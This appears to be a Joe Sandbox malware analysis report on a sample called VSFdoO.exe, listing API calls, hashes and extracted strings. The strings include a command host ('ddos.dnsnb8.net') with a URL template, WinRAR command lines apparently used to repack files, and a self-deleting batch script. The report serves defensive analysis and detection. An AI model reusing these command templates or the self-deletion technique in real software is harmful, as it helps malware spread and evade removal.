                                                            • API String ID: 4123949106-3189515311
                                                            • Opcode ID: f5e2f716753996b37784c08ab6aa3a272e83be382b16a1758849bbaa77271a65
                                                            • Instruction ID: 0fdbf9c64d04fe2acdc0f02976a17818db088dd1a3fde57f8d62126bd9a4ac9a
                                                            • Opcode Fuzzy Hash: f5e2f716753996b37784c08ab6aa3a272e83be382b16a1758849bbaa77271a65
                                                            • Instruction Fuzzy Hash: 41315271D40209EAEF60DBA5DC65FEEBBF8EB44704FA04179E504B2151E7709E49CB60
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                            • Instruction ID: cb1baf90717e2b689f9057885f825ff03e9a83c70c8b6672b74373f47ecb03c1
                                                            • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                            • Instruction Fuzzy Hash: 9E819171604B428FC728CF28D8946EABBE2EFD5314F14892DD0EA87791D739E849CB54
                                                            APIs
                                                            • strstr.MSVCRT ref: 000B23CC
                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 000B2464
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 000B2472
                                                            • CloseHandle.KERNEL32(?,00000000,00000000), ref: 000B24A8
                                                            • memset.MSVCRT ref: 000B24B9
                                                            • strrchr.MSVCRT ref: 000B24C9
                                                            • wsprintfA.USER32 ref: 000B24DE
                                                            • strrchr.MSVCRT ref: 000B24ED
                                                            • memset.MSVCRT ref: 000B24F2
                                                            • memset.MSVCRT ref: 000B2505
                                                            • wsprintfA.USER32 ref: 000B2524
                                                            • Sleep.KERNEL32(000007D0), ref: 000B2535
                                                            • Sleep.KERNEL32(000007D0), ref: 000B255D
                                                            • memset.MSVCRT ref: 000B256E
                                                            • wsprintfA.USER32 ref: 000B2585
                                                            • memset.MSVCRT ref: 000B25A6
                                                            • wsprintfA.USER32 ref: 000B25CA
                                                            • Sleep.KERNEL32(000007D0), ref: 000B25D0
                                                            • Sleep.KERNEL32(000007D0,?,?), ref: 000B25E5
                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 000B25FC
                                                            • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 000B2611
                                                            • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 000B2642
                                                            • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 000B265B
                                                            • SetEndOfFile.KERNEL32 ref: 000B266D
                                                            • CloseHandle.KERNEL32(00000000), ref: 000B2676
                                                            • RemoveDirectoryA.KERNEL32(?), ref: 000B2681
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                                            • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 2203340711-2169341206
                                                            • Opcode ID: 8cf101b9d66d43112cd7e9918dacf3c349c2b6ed8b90157e76381bbb4f1a5361
                                                            • Instruction ID: 31cfd5faaf525c8c8c1e0f04222c73264d20119eb6288e41505947f74f0943ca
                                                            • Opcode Fuzzy Hash: 8cf101b9d66d43112cd7e9918dacf3c349c2b6ed8b90157e76381bbb4f1a5361
                                                            • Instruction Fuzzy Hash: 678181B1504344BBE710EF64DC89EEB7BECEF88704F10062AFA44D21A1D774DA498B66
                                                            APIs
                                                            • memset.MSVCRT ref: 000B2766
                                                            • memset.MSVCRT ref: 000B2774
                                                            • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 000B2787
                                                            • wsprintfA.USER32 ref: 000B27AB
                                                              • Part of subcall function 000B185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,000B1118), ref: 000B1867
                                                              • Part of subcall function 000B185B: srand.MSVCRT ref: 000B1878
                                                              • Part of subcall function 000B185B: rand.MSVCRT ref: 000B1880
                                                              • Part of subcall function 000B185B: srand.MSVCRT ref: 000B1890
                                                              • Part of subcall function 000B185B: rand.MSVCRT ref: 000B1894
                                                            • wsprintfA.USER32 ref: 000B27C6
                                                            • CopyFileA.KERNEL32(?,000B4C80,00000000), ref: 000B27D4
                                                            • wsprintfA.USER32 ref: 000B27F4
                                                              • Part of subcall function 000B1973: PathFileExistsA.SHLWAPI(000B4E5C,00000000,C:\Users\user\AppData\Local\Temp\VSFdoO.exe), ref: 000B1992
                                                              • Part of subcall function 000B1973: CreateFileA.KERNEL32(000B4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 000B19BA
                                                              • Part of subcall function 000B1973: Sleep.KERNEL32(00000064), ref: 000B19C6
                                                              • Part of subcall function 000B1973: wsprintfA.USER32 ref: 000B19EC
                                                              • Part of subcall function 000B1973: CopyFileA.KERNEL32(000B4E5C,?,00000000), ref: 000B1A00
                                                              • Part of subcall function 000B1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000B1A1E
                                                              • Part of subcall function 000B1973: GetFileSize.KERNEL32(000B4E5C,00000000), ref: 000B1A2C
                                                              • Part of subcall function 000B1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 000B1A46
                                                              • Part of subcall function 000B1973: ReadFile.KERNEL32(000B4E5C,000B4E60,00000000,?,00000000), ref: 000B1A65
                                                            • DeleteFileA.KERNEL32(?,?,000B4E54,000B4E58), ref: 000B281A
                                                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,000B4E54,000B4E58), ref: 000B2832
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                                            • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                                            • API String ID: 692489704-3961832207
                                                            • Opcode ID: d6256a6a8b40cfac0fc3aaa87ce24e0f297ee0360c7c5da4f532bcac7db96346
                                                            • Instruction ID: 6d04ed7a22e6d7cc35d37736461d82b3d27f69469bf6425ffb4424386a3e0dc0
                                                            • Opcode Fuzzy Hash: d6256a6a8b40cfac0fc3aaa87ce24e0f297ee0360c7c5da4f532bcac7db96346
                                                            • Instruction Fuzzy Hash: BE2163B6D4021C7BEB10E7A49C99FEB77ACEF14744F4006A1B754E2142E674EF848AB0
                                                            APIs
                                                              • Part of subcall function 000B185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,000B1118), ref: 000B1867
                                                              • Part of subcall function 000B185B: srand.MSVCRT ref: 000B1878
                                                              • Part of subcall function 000B185B: rand.MSVCRT ref: 000B1880
                                                              • Part of subcall function 000B185B: srand.MSVCRT ref: 000B1890
                                                              • Part of subcall function 000B185B: rand.MSVCRT ref: 000B1894
                                                            • wsprintfA.USER32 ref: 000B15AA
                                                            • wsprintfA.USER32 ref: 000B15C6
                                                            • lstrlen.KERNEL32(?), ref: 000B15D2
                                                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 000B15EE
                                                            • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 000B1609
                                                            • CloseHandle.KERNEL32(00000000), ref: 000B1612
                                                            • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 000B162D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                                            • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\VSFdoO.exe$open
                                                            • API String ID: 617340118-3707420702
                                                            • Opcode ID: 0c6821e10a60f74a21cb0db2bc6ed7ed208f71c576e4d9665c53d2e3241bf982
                                                            • Instruction ID: c48da2e1cc0e2638948bf71231b3ba1119dfe3fadb940af179c65605bf41a4d5
                                                            • Opcode Fuzzy Hash: 0c6821e10a60f74a21cb0db2bc6ed7ed208f71c576e4d9665c53d2e3241bf982
                                                            • Instruction Fuzzy Hash: F9117372A011287BE72097A8DC89DEB7BBCDF59750F100551F659E3041EA74AF848BB0
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,000B1400), ref: 000B1226
                                                            • GetProcAddress.KERNEL32(00000000), ref: 000B122D
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,000B1400), ref: 000B123F
                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,000B1400), ref: 000B1250
                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\VSFdoO.exe,?,?,?,?,000B1400), ref: 000B129E
                                                            • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\VSFdoO.exe,?,?,?,?,000B1400), ref: 000B12B0
                                                            • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\VSFdoO.exe,?,?,?,?,000B1400), ref: 000B12F5
                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,000B1400), ref: 000B130A
                                                            Strings
                                                            • ntdll.dll, xrefs: 000B1219
                                                            • ZwQuerySystemInformation, xrefs: 000B1212
                                                            • C:\Users\user\AppData\Local\Temp\VSFdoO.exe, xrefs: 000B1262
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                                            • String ID: C:\Users\user\AppData\Local\Temp\VSFdoO.exe$ZwQuerySystemInformation$ntdll.dll
                                                            • API String ID: 1500695312-1584180211
                                                            • Opcode ID: 772e1f5d3388e147c3c490c04b7aea6ff0c4816ac684e2fd14502ce4080e4d54
                                                            • Instruction ID: 3b8411cb48188ab3e7fb6d2bc368c901711483c740bab084eca886d8c05c8f43
                                                            • Opcode Fuzzy Hash: 772e1f5d3388e147c3c490c04b7aea6ff0c4816ac684e2fd14502ce4080e4d54
                                                            • Instruction Fuzzy Hash: 7721E331605311ABE720AB64CC29BEBBBE8FF85B00F900A18F645E6280D774DA5087A5
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,000B1118), ref: 000B1867
                                                            • srand.MSVCRT ref: 000B1878
                                                            • rand.MSVCRT ref: 000B1880
                                                            • srand.MSVCRT ref: 000B1890
                                                            • rand.MSVCRT ref: 000B1894
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: Timerandsrand$FileSystem
                                                            • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                                            • API String ID: 4106363736-3273462101
                                                            • Opcode ID: 940b780fb2f6ba15de934327c71c88ac9dc634f4760cde665d796466cb2a89b6
                                                            • Instruction ID: a6e7603a90d69dd542b4030199670d5b6a4cfbdfcffc8de25813b0d44be61c8f
                                                            • Opcode Fuzzy Hash: 940b780fb2f6ba15de934327c71c88ac9dc634f4760cde665d796466cb2a89b6
                                                            • Instruction Fuzzy Hash: C7E09277A10218BBE710A7A9EC468DEBBACDF84161B200626F600D3250E574F9448AB4
                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,74DEE800,?,?,000B29DB,?,00000001), ref: 000B26A7
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,74DEE800,?,?,000B29DB,?,00000001), ref: 000B26B5
                                                            • lstrlen.KERNEL32(?), ref: 000B26C4
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 000B26CE
                                                            • lstrcpy.KERNEL32(00000004,?), ref: 000B26E3
                                                            • lstrcpy.KERNEL32(?,00000004), ref: 000B271F
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 000B272D
                                                            • SetEvent.KERNEL32 ref: 000B273C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                                            • String ID:
                                                            • API String ID: 41106472-0
                                                            • Opcode ID: 54c203d8957517c7e026500a978bd9fa9c3d2932e95dda23a25a679e49a60bea
                                                            • Instruction ID: 61de6939477929cac2e5ea16ca699cad91a769e3ebb308104287eb1246d3acc4
                                                            • Opcode Fuzzy Hash: 54c203d8957517c7e026500a978bd9fa9c3d2932e95dda23a25a679e49a60bea
                                                            • Instruction Fuzzy Hash: F9119D36544210EFEB31EF15EC488DA7BA9FF847207204225F95897221DB389A86DB64
                                                            APIs
                                                            Strings
                                                            • .exe, xrefs: 000B1C57
                                                            • yBPXVOvxuzizIaojhxQhMwWGbqTnrIudfFiMUWuGYqEtAxMSEalSvzLcGaHjWgSernecbXYZLDhJRtQsOKNZyKAoBjgVNBFPnvflIbPVmAUlwpNJCrXfqdEyKHUDkskZTeCwmsQTtRkpgOLoRCHFJcDmpdiY, xrefs: 000B1B8A, 000B1B9C, 000B1C15, 000B1C49
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: lstrcatmemcpymemsetrandsrand
                                                            • String ID: .exe$yBPXVOvxuzizIaojhxQhMwWGbqTnrIudfFiMUWuGYqEtAxMSEalSvzLcGaHjWgSernecbXYZLDhJRtQsOKNZyKAoBjgVNBFPnvflIbPVmAUlwpNJCrXfqdEyKHUDkskZTeCwmsQTtRkpgOLoRCHFJcDmpdiY
                                                            • API String ID: 122620767-2582101305
                                                            • Opcode ID: 4e87740cef2628604e6b4f47260c25cf60e3ada97aa2fc25255e7cc81d2a406c
                                                            • Instruction ID: 732b9bbd0966126d5b33a80c463a027b26304729aef946c816ef003c29685f27
                                                            • Opcode Fuzzy Hash: 4e87740cef2628604e6b4f47260c25cf60e3ada97aa2fc25255e7cc81d2a406c
                                                            • Instruction Fuzzy Hash: 3B216832F442906EE2661335AC60FEE3F84CFA3721F2541A9FA950B193D26C0A818264
                                                            APIs
                                                            • memset.MSVCRT ref: 000B18B1
                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,74DF0F00,75BF8400), ref: 000B18D3
                                                            • CloseHandle.KERNEL32(000B2549), ref: 000B18E9
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000B18F0
                                                            • GetExitCodeProcess.KERNEL32(?,000B2549), ref: 000B1901
                                                            • CloseHandle.KERNEL32(?), ref: 000B190A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                                            • String ID:
                                                            • API String ID: 876959470-0
                                                            • Opcode ID: 6c2b870c51a00cc0e95e11bd031a91dd6cc942c4a3a4417f2ba2671821134b0a
                                                            • Instruction ID: f2caf7f829e76d4c97eef632a3eca4bffc872b2ab0bee20415503ff3ec43ec3d
                                                            • Opcode Fuzzy Hash: 6c2b870c51a00cc0e95e11bd031a91dd6cc942c4a3a4417f2ba2671821134b0a
                                                            • Instruction Fuzzy Hash: 0901DF32900128BBDB20ABD2DC48DDFBF7DFF85330F104121FA15A10A0D2355A18CBA0
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 000B1334
                                                            • GetProcAddress.KERNEL32(00000000), ref: 000B133B
                                                            • memset.MSVCRT ref: 000B1359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcmemset
                                                            • String ID: NtSystemDebugControl$ntdll.dll
                                                            • API String ID: 3137504439-2438149413
                                                            • Opcode ID: 888466e5c09bf876e979a39f17a5d264fdcc2c408af38ce660cc86b91af59465
                                                            • Instruction ID: 9aa342424a68b3cb76686b1d18857bf3431143264585f66ec9e67f72a9710a08
                                                            • Opcode Fuzzy Hash: 888466e5c09bf876e979a39f17a5d264fdcc2c408af38ce660cc86b91af59465
                                                            • Instruction Fuzzy Hash: 42016D71600309BFEB10DF98AC859EFBBECFB41714F50462AF902A2141E2B49B15CA51
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: strrchr$lstrcmpilstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 3636361484-0
                                                            • Opcode ID: 55cf31d10d558bbc864ed9e6c88592e5400222aa507e9b57a890f683d056223e
                                                            • Instruction ID: bd8a23bf1e22b17fa6670f01f16257184527976956019ce9095e4bae1244eeb3
                                                            • Opcode Fuzzy Hash: 55cf31d10d558bbc864ed9e6c88592e5400222aa507e9b57a890f683d056223e
                                                            • Instruction Fuzzy Hash: A001F9B29142196FFF206B60EC58BD677ECDF14310F540066EA45E3090EB78EA848BA0
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000B603C
                                                            • GetProcAddress.KERNEL32(00000000,000B6064), ref: 000B604F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2145301025.00000000000B6000.00000040.00000001.01000000.00000004.sdmp, Offset: 000B0000, based on PE: true
                                                            • Associated: 00000001.00000002.2145132462.00000000000B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145176337.00000000000B1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145213649.00000000000B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.2145252300.00000000000B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_b0000_VSFdoO.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: kernel32.dll
                                                            • API String ID: 1646373207-1793498882
                                                            • Opcode ID: 1695e5eb793c5435feb7f39777b37fb6727423a533b4508e209be8457a5b5abc
                                                            • Instruction ID: 3255e68503e484d22ecb821285c86f7f6f5c27cb50c0bbcd6640eb264f153da6
                                                            • Opcode Fuzzy Hash: 1695e5eb793c5435feb7f39777b37fb6727423a533b4508e209be8457a5b5abc
                                                            • Instruction Fuzzy Hash: EDF0F0B21442898FEFB08EA4CC84BDE3BE4EB15700F50042AEA09CB281CB3986058B24
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.4147037165.0000000003C3D000.00000004.00000010.00020000.00000000.sdmp, Offset: 03C3D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_3c3d000_svchost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 294cdfb1266c4b8d2172728f73a1e30f0314fb8573348b8634c7dccae129f4b3
                                                            • Instruction ID: 49091132ab2de9e52284b48960250150c8d8a056bb917e12e3a506e2773442ec
                                                            • Opcode Fuzzy Hash: 294cdfb1266c4b8d2172728f73a1e30f0314fb8573348b8634c7dccae129f4b3
                                                            • Instruction Fuzzy Hash: C3E0EC3194E3C15FDB138B74C8615843FB1AE4722171E56DAC044CF0B3D2282457DB12